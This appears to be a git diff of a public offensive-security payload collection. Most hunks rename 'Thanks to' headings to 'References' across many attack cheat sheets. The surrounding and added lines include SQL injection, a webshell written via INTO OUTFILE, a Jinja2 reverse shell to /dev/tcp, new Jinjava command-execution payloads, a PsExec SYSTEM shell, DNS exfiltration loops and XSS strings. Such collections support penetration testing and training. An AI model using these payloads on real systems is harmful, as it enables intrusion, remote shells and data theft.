PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
|
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||||
|
|
|
@ -84,7 +84,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||||
[$ne]=1
|
[$ne]=1
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
|
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
|
||||||
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
|
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
|
||||||
|
|
|
@ -46,7 +46,7 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
|
||||||
|
|
||||||
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
|
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
|
||||||
* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
|
* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
|
||||||
|
|
|
@ -124,7 +124,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||||
?return_path={payload}
|
?return_path={payload}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* filedescriptor
|
* filedescriptor
|
||||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||||
|
|
|
@ -56,7 +56,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||||
* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
|
@ -156,7 +156,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
||||||
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
|
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
||||||
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
|
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||||
|
|
|
@ -32,6 +32,6 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT
|
||||||
|
|
||||||
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
|
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|
|
@ -119,7 +119,7 @@ RECONFIGURE
|
||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||||
|
|
|
@ -125,3 +125,5 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
|
||||||
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
|
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
|
||||||
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
|
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## References
|
|
@ -91,6 +91,6 @@ EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f7220726570
|
||||||
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
|
* [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
|
||||||
|
|
|
@ -44,6 +44,6 @@ SELECT * FROM pentestlab;
|
||||||
COPY pentestlab(t) TO '/tmp/pentestlab';
|
COPY pentestlab(t) TO '/tmp/pentestlab';
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
|
@ -460,7 +460,7 @@ mysql> mysql> select version();
|
||||||
+-------------------------+
|
+-------------------------+
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to - Other resources
|
## References
|
||||||
|
|
||||||
* Detect SQLi
|
* Detect SQLi
|
||||||
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||||
|
|
|
@ -73,6 +73,6 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
|
||||||
|
|
||||||
Note: By default this component is disabled
|
Note: By default this component is disabled
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
||||||
|
|
|
@ -470,7 +470,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
|
||||||
- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
|
- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
|
||||||
- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
|
- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
|
|
|
@ -11,6 +11,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
|
||||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Methodology
|
||||||
|
|
||||||
|
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true)
|
||||||
|
|
||||||
## Ruby
|
## Ruby
|
||||||
|
|
||||||
### Basic injection
|
### Basic injection
|
||||||
|
@ -141,7 +145,7 @@ ${x}
|
||||||
[Official website](http://jinja.pocoo.org/)
|
[Official website](http://jinja.pocoo.org/)
|
||||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
### Jinja 2 - Basic injection
|
### Jinja2 - Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{4*4}}[[5*5]]
|
{{4*4}}[[5*5]]
|
||||||
|
@ -211,6 +215,33 @@ Inject this template
|
||||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Jinjava
|
||||||
|
|
||||||
|
|
||||||
|
### Jinjava - Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.toUpperCase()}} would result in 'A'
|
||||||
|
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
|
||||||
|
```
|
||||||
|
|
||||||
|
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
||||||
|
|
||||||
|
### Jinjava - Command execution
|
||||||
|
|
||||||
|
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
```
|
||||||
|
|
||||||
## Client Side Template Injection
|
## Client Side Template Injection
|
||||||
|
|
||||||
### AngularJS
|
### AngularJS
|
||||||
|
@ -226,7 +257,7 @@ $eval('1+1')
|
||||||
{{constructor.constructor('alert(1)')()}}
|
{{constructor.constructor('alert(1)')()}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||||
|
@ -236,3 +267,4 @@ $eval('1+1')
|
||||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
||||||
|
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
|
@ -12,7 +12,7 @@ These files work against a "tar *"
|
||||||
shell.sh (your exploit code is here)
|
shell.sh (your exploit code is here)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
* [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||||||
* [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
|
* [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
|
||||||
|
|
|
@ -43,6 +43,6 @@ UTF-8 Unicode encoding
|
||||||
\ = %c0%5c, %c0%80%5c
|
\ = %c0%5c, %c0%80%5c
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||||
|
|
|
@ -59,6 +59,6 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e
|
||||||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||||
|
|
|
@ -50,7 +50,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
||||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
||||||
|
|
|
@ -33,7 +33,7 @@ substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
||||||
|
|
|
@ -859,7 +859,7 @@ Notification.requestPermission(x=>{new(Notification)(1)})
|
||||||
|
|
||||||
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
|
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||||
- tbm
|
- tbm
|
||||||
|
|
|
@ -149,6 +149,6 @@ Vue JS
|
||||||
{{constructor.constructor('alert(1)')()}}
|
{{constructor.constructor('alert(1)')()}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
|
- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
|
|
@ -42,3 +42,8 @@ From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
|
||||||
```
|
```
|
||||||
|
|
||||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [TODO](TODO)
|
|
@ -188,7 +188,7 @@ JPG (experimental)
|
||||||
GIF (experimental)
|
GIF (experimental)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
||||||
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
|
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
|
||||||
|
|
Loading…
Reference in a new issue